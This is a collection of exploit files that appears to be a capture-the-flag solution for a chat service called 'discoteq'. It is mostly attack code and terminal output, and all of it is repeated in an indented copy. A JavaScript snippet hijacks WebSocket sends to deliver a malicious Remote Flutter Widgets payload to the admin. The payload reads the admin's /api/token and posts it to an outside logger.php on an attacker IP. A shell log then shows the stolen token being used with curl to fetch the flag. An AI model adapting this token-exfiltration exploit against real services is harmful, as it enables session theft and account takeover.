stypr/exploit.js

## exploit.js
// run before send
const originalSend = WebSocket.prototype.send;
window.sockets = [];
WebSocket.prototype.send = function(...args) {
  if (window.sockets.indexOf(this) === -1)
    window.sockets.push(this);
  return originalSend.call(this, ...args);
};

// run after send
data = {
    "type":"widget",
    "widget":"@158.101.144.10/defcon_exp/exploit.php",
    "author": {
        "user":"1234#f8d4d5ab",
        "platform":"web"
    },
    "recipients":[
        "admin#13371337"
    ],
    "data":{
        "message":"styyyyyyyyyyyyyyyyyy",
        "flag_url": "@158.101.144.10/defcon_exp/logger.php",
        "apiGet": "/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495",
        "apiVote": "/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495"
    }
}

window.sockets[0].send(JSON.stringify(data));

## exploit.rfwtxt
import core.widgets;
import core.material;
import local;

widget root { loaded: false } = Container(
    child: Column(
        mainAxisAlignment: "center",
        children: [
            switch state.loaded {
                true: Column(
                    children: [
                        Text(
                            text: data.new_token
                        ),
                        ApiMapper(
                            url: data.data.apiGet,
                            jsonKey: "options",
                            dataKey: "poll_result",
                            onLoaded: event "api_post" {
                                path: data.data.flag_url,
                                body: {admin_token: data.new_token}
                            }
                        ),
                    ],
                ),
                false: ApiMapper(
                   url: "/api/token",
                   jsonKey: "new_token",
                   dataKey: "new_token",
                   onLoaded: set state.loaded = true
                ),
            },
        ],
    ),
);

## exploit.sh
$ snap install flutter
$ dart rfw_compile.dart
$ // upload exploit.rfw, send to admin, get admin_token
$ cat /tmp/leaked_token
{"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
$ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
{"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}

## rfw_compile.dart
// snap install dart
// dart rfw_compile.dart

import 'dart:io';

import 'package:rfw/formats.dart';

void main() {
  final String pluginZZ = File('exploit.rfwtxt').readAsStringSync();
  File('exploit.rfw').writeAsBytesSync(encodeLibraryBlob(parseLibraryFile(pluginZZ)));
}
	// run before send
	const originalSend = WebSocket.prototype.send;
	window.sockets = [];
	WebSocket.prototype.send = function(...args) {
	if (window.sockets.indexOf(this) === -1)
	window.sockets.push(this);
	return originalSend.call(this, ...args);
	};

	// run after send
	data = {
	"type":"widget",
	"widget":"@158.101.144.10/defcon_exp/exploit.php",
	"author": {
	"user":"1234#f8d4d5ab",
	"platform":"web"
	},
	"recipients":[
	"admin#13371337"
	],
	"data":{
	"message":"styyyyyyyyyyyyyyyyyy",
	"flag_url": "@158.101.144.10/defcon_exp/logger.php",
	"apiGet": "/api/poll/options?poll=e86188d3-5e28-4b85-b1ba-231504a37495",
	"apiVote": "/api/poll/vote?poll=e86188d3-5e28-4b85-b1ba-231504a37495"
	}
	}

	window.sockets[0].send(JSON.stringify(data));
	import core.widgets;
	import core.material;
	import local;

	widget root { loaded: false } = Container(
	child: Column(
	mainAxisAlignment: "center",
	children: [
	switch state.loaded {
	true: Column(
	children: [
	Text(
	text: data.new_token
	),
	ApiMapper(
	url: data.data.apiGet,
	jsonKey: "options",
	dataKey: "poll_result",
	onLoaded: event "api_post" {
	path: data.data.flag_url,
	body: {admin_token: data.new_token}
	}
	),
	],
	),
	false: ApiMapper(
	url: "/api/token",
	jsonKey: "new_token",
	dataKey: "new_token",
	onLoaded: set state.loaded = true
	),
	},
	],
	),
	);
	$ snap install flutter
	$ dart rfw_compile.dart
	$ // upload exploit.rfw, send to admin, get admin_token
	$ cat /tmp/leaked_token
	{"admin_token":["a","d","m","i","n","%","2","3","1","3","3","7","1","3","3","7",".","0","c","g","U","R","K","T","-","O","7","O","p","O","Q","K","a","g","F","q","v","5","h","3","i","W","2","c","5","c","f","9","s","i","D","1","4","u","u","h","3","-","0","U"]
	$ curl "http://discoteq-thl53at4nuzlm.shellweplayaga.me/api/flag" -H "Cookie: token=admin#13371337.0cgURKT-O7OpOQKagFqv5h3iW2c5cf9siD14uuh3-0U" -d '{"ticket":"ticket{...}"}
	{"flag":"flag{AnchorJackline3058n22:ydHlchqaomMyj_wH7Bke3CcIAVY_Y5wwn02c66s4QU17GdcW1NhliZgpHxOd6EZpkvlkJjjm9CF95K37nGfA1g}"}
	// snap install dart
	// dart rfw_compile.dart

	import 'dart:io';

	import 'package:rfw/formats.dart';

	void main() {
	final String pluginZZ = File('exploit.rfwtxt').readAsStringSync();
	File('exploit.rfw').writeAsBytesSync(encodeLibraryBlob(parseLibraryFile(pluginZZ)));
	}